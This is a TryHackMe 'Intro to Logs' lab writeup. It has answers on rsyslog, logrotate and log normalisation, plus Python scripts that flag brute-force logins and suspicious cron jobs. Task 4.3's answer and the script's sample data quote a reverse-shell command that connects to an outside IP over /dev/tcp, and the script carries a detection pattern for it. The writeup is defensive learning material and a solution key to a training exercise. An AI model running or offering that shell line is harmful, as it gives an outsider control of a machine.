Tryhackme: Intro to Logs Writeup - Aleyna Doğan

Tryhackme: Intro to Logs Writeup

Learn the fundamentals of logging, data sources, collection methods and principles to step into the log analysis world.

Lab link.

Task 2: Expanding Perspectives: Logs as Evidence of Historical Activity

2.1. What is the name of your colleague who left a note on your Desktop?

Perry

2.2. What is the full path to the suggested log file for initial investigation?

/var/log/gitlab/nginx/access.log

Task 3: Types, Formats, and Standards

3.1. Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?

Web Server Log

3.2. Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?

Combined

Task 4: Collection, Management, and Centralisation

You can check if rsyslog is installed:

To create the configuration file:

Save and close the configuration file, then apply the changes by restarting rsyslog with the command:

4.1. After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?

stansimon

4.2. What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?

10.10.10.101

4.3. Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?

/bin/bash -c "/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1"
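The two Task 4 answers come from reading rsyslog output by hand: repeated failed sshd logins from one account, and a cron job whose command opens a shell over /dev/tcp. The script below is an added example, not part of this writeup or the TryHackMe room, showing how a defender would pull the same findings out of rsyslog-format lines automatically. The sample log lines are constructed (hostname, PIDs, timestamps and the 10.10.10.x source addresses are made up); only the cron command mirrors the one found in rsyslog_cron.log.

```python
import re
from collections import Counter

# Constructed sample lines in rsyslog's traditional file format (the format
# the room's /var/log/websrv-02/rsyslog_*.log files use). Hostname, PIDs,
# timestamps and source IPs are made up for this example.
SAMPLE_SSHD_LOG = """\
Aug  2 10:15:01 websrv-02 sshd[1201]: Failed password for stansimon from 10.10.10.5 port 54321 ssh2
Aug  2 10:15:03 websrv-02 sshd[1203]: Failed password for stansimon from 10.10.10.5 port 54322 ssh2
Aug  2 10:15:05 websrv-02 sshd[1205]: Failed password for invalid user admin from 10.10.10.5 port 54323 ssh2
Aug  2 10:15:07 websrv-02 sshd[1207]: Failed password for stansimon from 10.10.10.5 port 54324 ssh2
Aug  2 10:15:09 websrv-02 sshd[1209]: Accepted password for perry from 10.10.10.7 port 40000 ssh2
"""

SAMPLE_CRON_LOG = """\
Aug  2 10:16:01 websrv-02 CRON[2301]: (root) CMD (/bin/bash -c "/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1")
Aug  2 10:17:01 websrv-02 CRON[2302]: (www-data) CMD (/usr/bin/php /var/www/cleanup.php)
Aug  2 10:18:01 websrv-02 CRON[2303]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)
"""

# "Mon DD HH:MM:SS host program[pid]: message" as rsyslog writes it by default.
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[^\[\s:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
CRON_CMD_RE = re.compile(r"^\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")
# Things a scheduled job normally has no business doing: talking to a raw
# TCP/UDP socket from bash, or running an interactive shell from cron.
SUSPICIOUS_CMD_RE = re.compile(r"/dev/tcp/|/dev/udp/|bash -i")


def parse_syslog_line(line):
    """Split one rsyslog line into its fields, or return None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def failed_logins(log_text):
    """Count failed sshd password attempts, keyed by (username, source IP)."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_syslog_line(line)
        if not rec or rec["prog"] != "sshd":
            continue
        m = FAILED_RE.search(rec["msg"])
        if m:
            counts[(m["user"], m["ip"])] += 1
    return counts


def brute_force_candidates(log_text, threshold=3):
    """Return (user, ip, attempts) for every pair at or above the threshold."""
    return [(u, ip, n) for (u, ip), n in failed_logins(log_text).items() if n >= threshold]


def suspicious_cron_commands(log_text):
    """Return (timestamp, user, command) for cron jobs matching SUSPICIOUS_CMD_RE."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_syslog_line(line)
        if not rec or rec["prog"] != "CRON":
            continue
        m = CRON_CMD_RE.match(rec["msg"])
        if m and SUSPICIOUS_CMD_RE.search(m["cmd"]):
            hits.append((rec["ts"], m["user"], m["cmd"]))
    return hits


if __name__ == "__main__":
    for user, ip, n in brute_force_candidates(SAMPLE_SSHD_LOG):
        print(f"possible brute force: {user} from {ip} ({n} failures)")
    for ts, user, cmd in suspicious_cron_commands(SAMPLE_CRON_LOG):
        print(f"suspicious cron job at {ts} as {user}: {cmd}")
```

Run it on the real files with `open(path).read()` in place of the sample strings. The `threshold` value and the `SUSPICIOUS_CMD_RE` pattern are the tuning knobs: the former controls how many failures from one user/IP pair count as brute forcing, the latter is deliberately narrow so it flags shell-over-socket commands without alerting on ordinary maintenance jobs such as logrotate.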

Task 5: Storage, Retention, and Deletion

5.1. Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?

24

5.2. Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?

hourly

Task 6: Hands-on Exercise: Log analysis process, tools, and techniques

6.1. Upon accessing the log viewer URL for unparsed raw log files, what error does "/var/log/websrv-02/rsyslog_cron.log" show when selecting the different filters?

No date field

6.2. What is the process of standardising parsed data into a more easily readable and query-able format?

Normalisation

6.3. What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?

Enrichment
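Task 3 identified the nginx access log as a Combined-format web server log, and Task 6 names the two steps that follow parsing: normalisation (typed, consistently named fields) and enrichment (consolidating events per IP and attaching context). The script below is an added example, written for this writeup rather than taken from the TryHackMe room, that walks one batch of lines through all three steps. The access-log lines are constructed (addresses, paths, sizes and the deliberately malformed last line are made up), and `KNOWN_CONTEXT` is a stand-in for whatever asset inventory or threat-intel source a real pipeline would consult.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the nginx/Apache "combined" format, the format
# the room identifies for /var/log/gitlab/nginx/access.log. Everything in
# them (IPs, users, paths, sizes, agents) is made up for this example, and
# the last line is intentionally not a valid entry.
SAMPLE_ACCESS_LOG = """\
10.10.10.5 - - [02/Aug/2023:10:20:01 +0000] "GET /users/sign_in HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.10.10.5 - - [02/Aug/2023:10:20:02 +0000] "POST /users/sign_in HTTP/1.1" 401 812 "http://gitlab.local/users/sign_in" "python-requests/2.31"
10.10.10.5 - - [02/Aug/2023:10:20:03 +0000] "POST /users/sign_in HTTP/1.1" 401 812 "http://gitlab.local/users/sign_in" "python-requests/2.31"
10.10.10.7 - perry [02/Aug/2023:10:21:00 +0000] "GET /dashboard HTTP/1.1" 200 10233 "-" "Mozilla/5.0"
10.10.10.5 - - [02/Aug/2023:10:21:30 +0000] "GET /admin HTTP/1.1" 404 153 "-" "python-requests/2.31"
this line is not a valid combined-format entry
"""

# $remote_addr $ident $remote_user [$time_local] "$request" $status $bytes "$referer" "$user_agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_combined(line):
    """Step 1, parsing: split one raw line into its named fields, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def normalise(fields):
    """Step 2, normalisation: turn raw strings into typed, consistently named fields."""
    parts = fields["request"].split(" ")
    method, path, proto = (parts + [None, None, None])[:3]  # tolerate short requests
    return {
        "timestamp": datetime.strptime(fields["time"], "%d/%b/%Y:%H:%M:%S %z"),
        "src_ip": fields["ip"],
        "user": None if fields["user"] == "-" else fields["user"],
        "method": method,
        "path": path,
        "protocol": proto,
        "status": int(fields["status"]),
        "bytes": 0 if fields["bytes"] == "-" else int(fields["bytes"]),
        "referer": None if fields["referer"] == "-" else fields["referer"],
        "user_agent": fields["agent"],
    }


def load_access_log(text):
    """Parse and normalise every line; keep unparsed lines aside instead of dropping them silently."""
    events, unparsed = [], []
    for line in text.splitlines():
        fields = parse_combined(line)
        if fields is None:
            unparsed.append(line)
        else:
            events.append(normalise(fields))
    return events, unparsed


# Constructed enrichment source. In a real pipeline this lookup would be an
# asset inventory, GeoIP database or threat-intel feed; this mapping is made up.
KNOWN_CONTEXT = {"10.10.10.7": "workstation-perry"}


def enrich_by_ip(events):
    """Step 3, enrichment: consolidate normalised events per source IP and attach context."""
    summary = defaultdict(lambda: {
        "requests": 0, "errors": 0, "paths": set(), "user_agents": set(),
        "first_seen": None, "last_seen": None,
    })
    for ev in events:
        s = summary[ev["src_ip"]]
        s["requests"] += 1
        if ev["status"] >= 400:
            s["errors"] += 1
        s["paths"].add(ev["path"])
        s["user_agents"].add(ev["user_agent"])
        ts = ev["timestamp"]
        s["first_seen"] = ts if s["first_seen"] is None else min(s["first_seen"], ts)
        s["last_seen"] = ts if s["last_seen"] is None else max(s["last_seen"], ts)
    for ip, s in summary.items():
        s["context"] = KNOWN_CONTEXT.get(ip, "unknown")
    return dict(summary)


if __name__ == "__main__":
    events, unparsed = load_access_log(SAMPLE_ACCESS_LOG)
    print(f"{len(events)} events parsed, {len(unparsed)} lines could not be parsed")
    for ip, s in enrich_by_ip(events).items():
        print(ip, s["context"], s["requests"], "requests", s["errors"], "errors",
              "from", s["first_seen"].isoformat(), "to", s["last_seen"].isoformat())
```

The unparsed list is worth keeping: an access log that suddenly produces lines the regex rejects usually means the log format changed or something wrote garbage into the file, and both are things an analyst wants to notice rather than have discarded. The per-IP summary is the "consolidation" Task 6 describes; sorting it by `errors` or by the size of `user_agents` is a quick way to surface the addresses that deserve a closer look.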
